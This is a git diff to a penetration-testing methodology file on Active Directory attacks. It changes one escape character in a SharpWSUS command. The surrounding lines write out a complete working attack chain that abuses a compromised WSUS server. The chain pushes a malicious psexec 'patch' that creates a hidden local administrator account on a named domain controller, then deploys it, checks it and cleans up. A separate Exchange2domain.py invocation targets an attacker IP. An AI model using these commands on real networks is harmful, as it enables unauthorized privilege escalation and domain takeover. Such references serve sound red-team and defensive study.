diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 8d4e0b0..c8a2c4c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3528,7 +3528,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th 1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate` 2. After WSUS Server compromise: `SharpWSUS.exe inspect` -3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` +3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` 4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"` 5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local` 6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group`